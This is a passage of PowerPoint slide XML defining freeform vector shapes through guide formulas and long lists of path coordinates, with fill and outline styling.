                  <a:gd name="T76" fmla="*/ 257 w 302"/>
                  <a:gd name="T77" fmla="*/ 287 h 300"/>
                  <a:gd name="T78" fmla="*/ 242 w 302"/>
                  <a:gd name="T79" fmla="*/ 279 h 300"/>
                  <a:gd name="T80" fmla="*/ 229 w 302"/>
                  <a:gd name="T81" fmla="*/ 277 h 300"/>
                  <a:gd name="T82" fmla="*/ 210 w 302"/>
                  <a:gd name="T83" fmla="*/ 272 h 300"/>
                  <a:gd name="T84" fmla="*/ 195 w 302"/>
                  <a:gd name="T85" fmla="*/ 267 h 300"/>
                  <a:gd name="T86" fmla="*/ 177 w 302"/>
                  <a:gd name="T87" fmla="*/ 259 h 300"/>
                  <a:gd name="T88" fmla="*/ 158 w 302"/>
                  <a:gd name="T89" fmla="*/ 261 h 300"/>
                  <a:gd name="T90" fmla="*/ 157 w 302"/>
                  <a:gd name="T91" fmla="*/ 245 h 300"/>
                  <a:gd name="T92" fmla="*/ 153 w 302"/>
                  <a:gd name="T93" fmla="*/ 227 h 300"/>
                  <a:gd name="T94" fmla="*/ 150 w 302"/>
                  <a:gd name="T95" fmla="*/ 208 h 300"/>
                  <a:gd name="T96" fmla="*/ 140 w 302"/>
                  <a:gd name="T97" fmla="*/ 202 h 300"/>
                  <a:gd name="T98" fmla="*/ 131 w 302"/>
                  <a:gd name="T99" fmla="*/ 196 h 300"/>
                  <a:gd name="T100" fmla="*/ 116 w 302"/>
                  <a:gd name="T101" fmla="*/ 203 h 300"/>
                  <a:gd name="T102" fmla="*/ 99 w 302"/>
                  <a:gd name="T103" fmla="*/ 212 h 300"/>
                  <a:gd name="T104" fmla="*/ 79 w 302"/>
                  <a:gd name="T105" fmla="*/ 207 h 300"/>
                  <a:gd name="T106" fmla="*/ 69 w 302"/>
                  <a:gd name="T107" fmla="*/ 181 h 300"/>
                  <a:gd name="T108" fmla="*/ 56 w 302"/>
                  <a:gd name="T109" fmla="*/ 179 h 300"/>
                  <a:gd name="T110" fmla="*/ 29 w 302"/>
                  <a:gd name="T111" fmla="*/ 179 h 300"/>
                  <a:gd name="T112" fmla="*/ 12 w 302"/>
                  <a:gd name="T113" fmla="*/ 180 h 300"/>
                  <a:gd name="T114" fmla="*/ 0 w 302"/>
                  <a:gd name="T115" fmla="*/ 176 h 300"/>
                  <a:gd name="T116" fmla="*/ 6 w 302"/>
                  <a:gd name="T117" fmla="*/ 167 h 300"/>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302"/>
                  <a:gd name="T178" fmla="*/ 0 h 300"/>
                  <a:gd name="T179" fmla="*/ 302 w 302"/>
                  <a:gd name="T180" fmla="*/ 300 h 300"/>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302" h="300">
                    <a:moveTo>
                      <a:pt x="13" y="160"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="160"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36401" name="Freeform 133"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3291" y="2406"/>
                <a:ext cx="337" cy="296"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 337"/>
                  <a:gd name="T1" fmla="*/ 270 h 296"/>
                  <a:gd name="T2" fmla="*/ 114 w 337"/>
                  <a:gd name="T3" fmla="*/ 252 h 296"/>
                  <a:gd name="T4" fmla="*/ 99 w 337"/>
                  <a:gd name="T5" fmla="*/ 226 h 296"/>
                  <a:gd name="T6" fmla="*/ 88 w 337"/>
                  <a:gd name="T7" fmla="*/ 213 h 296"/>
                  <a:gd name="T8" fmla="*/ 69 w 337"/>
                  <a:gd name="T9" fmla="*/ 194 h 296"/>
                  <a:gd name="T10" fmla="*/ 68 w 337"/>
                  <a:gd name="T11" fmla="*/ 173 h 296"/>
                  <a:gd name="T12" fmla="*/ 59 w 337"/>
                  <a:gd name="T13" fmla="*/ 153 h 296"/>
                  <a:gd name="T14" fmla="*/ 48 w 337"/>
                  <a:gd name="T15" fmla="*/ 142 h 296"/>
                  <a:gd name="T16" fmla="*/ 38 w 337"/>
                  <a:gd name="T17" fmla="*/ 134 h 296"/>
                  <a:gd name="T18" fmla="*/ 35 w 337"/>
                  <a:gd name="T19" fmla="*/ 119 h 296"/>
                  <a:gd name="T20" fmla="*/ 17 w 337"/>
                  <a:gd name="T21" fmla="*/ 92 h 296"/>
                  <a:gd name="T22" fmla="*/ 5 w 337"/>
                  <a:gd name="T23" fmla="*/ 74 h 296"/>
                  <a:gd name="T24" fmla="*/ 0 w 337"/>
                  <a:gd name="T25" fmla="*/ 71 h 296"/>
                  <a:gd name="T26" fmla="*/ 5 w 337"/>
                  <a:gd name="T27" fmla="*/ 54 h 296"/>
                  <a:gd name="T28" fmla="*/ 27 w 337"/>
                  <a:gd name="T29" fmla="*/ 50 h 296"/>
                  <a:gd name="T30" fmla="*/ 41 w 337"/>
                  <a:gd name="T31" fmla="*/ 41 h 296"/>
                  <a:gd name="T32" fmla="*/ 45 w 337"/>
                  <a:gd name="T33" fmla="*/ 25 h 296"/>
                  <a:gd name="T34" fmla="*/ 60 w 337"/>
                  <a:gd name="T35" fmla="*/ 7 h 296"/>
                  <a:gd name="T36" fmla="*/ 72 w 337"/>
                  <a:gd name="T37" fmla="*/ 0 h 296"/>
                  <a:gd name="T38" fmla="*/ 86 w 337"/>
                  <a:gd name="T39" fmla="*/ 6 h 296"/>
                  <a:gd name="T40" fmla="*/ 126 w 337"/>
                  <a:gd name="T41" fmla="*/ 27 h 296"/>
                  <a:gd name="T42" fmla="*/ 132 w 337"/>
                  <a:gd name="T43" fmla="*/ 34 h 296"/>
                  <a:gd name="T44" fmla="*/ 139 w 337"/>
                  <a:gd name="T45" fmla="*/ 40 h 296"/>
                  <a:gd name="T46" fmla="*/ 146 w 337"/>
                  <a:gd name="T47" fmla="*/ 51 h 296"/>
                  <a:gd name="T48" fmla="*/ 198 w 337"/>
                  <a:gd name="T49" fmla="*/ 60 h 296"/>
                  <a:gd name="T50" fmla="*/ 204 w 337"/>
                  <a:gd name="T51" fmla="*/ 67 h 296"/>
                  <a:gd name="T52" fmla="*/ 217 w 337"/>
                  <a:gd name="T53" fmla="*/ 68 h 296"/>
                  <a:gd name="T54" fmla="*/ 223 w 337"/>
                  <a:gd name="T55" fmla="*/ 83 h 296"/>
                  <a:gd name="T56" fmla="*/ 229 w 337"/>
                  <a:gd name="T57" fmla="*/ 85 h 296"/>
                  <a:gd name="T58" fmla="*/ 231 w 337"/>
                  <a:gd name="T59" fmla="*/ 90 h 296"/>
                  <a:gd name="T60" fmla="*/ 240 w 337"/>
                  <a:gd name="T61" fmla="*/ 94 h 296"/>
                  <a:gd name="T62" fmla="*/ 241 w 337"/>
                  <a:gd name="T63" fmla="*/ 100 h 296"/>
                  <a:gd name="T64" fmla="*/ 241 w 337"/>
                  <a:gd name="T65" fmla="*/ 110 h 296"/>
                  <a:gd name="T66" fmla="*/ 244 w 337"/>
                  <a:gd name="T67" fmla="*/ 119 h 296"/>
                  <a:gd name="T68" fmla="*/ 248 w 337"/>
                  <a:gd name="T69" fmla="*/ 125 h 296"/>
                  <a:gd name="T70" fmla="*/ 253 w 337"/>
                  <a:gd name="T71" fmla="*/ 136 h 296"/>
                  <a:gd name="T72" fmla="*/ 257 w 337"/>
                  <a:gd name="T73" fmla="*/ 138 h 296"/>
                  <a:gd name="T74" fmla="*/ 270 w 337"/>
                  <a:gd name="T75" fmla="*/ 165 h 296"/>
                  <a:gd name="T76" fmla="*/ 321 w 337"/>
                  <a:gd name="T77" fmla="*/ 178 h 296"/>
                  <a:gd name="T78" fmla="*/ 332 w 337"/>
                  <a:gd name="T79" fmla="*/ 175 h 296"/>
                  <a:gd name="T80" fmla="*/ 299 w 337"/>
                  <a:gd name="T81" fmla="*/ 216 h 296"/>
                  <a:gd name="T82" fmla="*/ 269 w 337"/>
                  <a:gd name="T83" fmla="*/ 232 h 296"/>
                  <a:gd name="T84" fmla="*/ 206 w 337"/>
                  <a:gd name="T85" fmla="*/ 254 h 296"/>
                  <a:gd name="T86" fmla="*/ 199 w 337"/>
                  <a:gd name="T87" fmla="*/ 260 h 296"/>
                  <a:gd name="T88" fmla="*/ 162 w 337"/>
                  <a:gd name="T89" fmla="*/ 276 h 296"/>
                  <a:gd name="T90" fmla="*/ 145 w 337"/>
                  <a:gd name="T91" fmla="*/ 258 h 296"/>
                  <a:gd name="T92" fmla="*/ 135 w 337"/>
                  <a:gd name="T93" fmla="*/ 257 h 296"/>
                  <a:gd name="T94" fmla="*/ 134 w 337"/>
                  <a:gd name="T95" fmla="*/ 267 h 29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337"/>
                  <a:gd name="T145" fmla="*/ 0 h 296"/>
                  <a:gd name="T146" fmla="*/ 337 w 337"/>
                  <a:gd name="T147" fmla="*/ 296 h 29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337" h="296">
                    <a:moveTo>
                      <a:pt x="128" y="276"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="128" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="149"/>
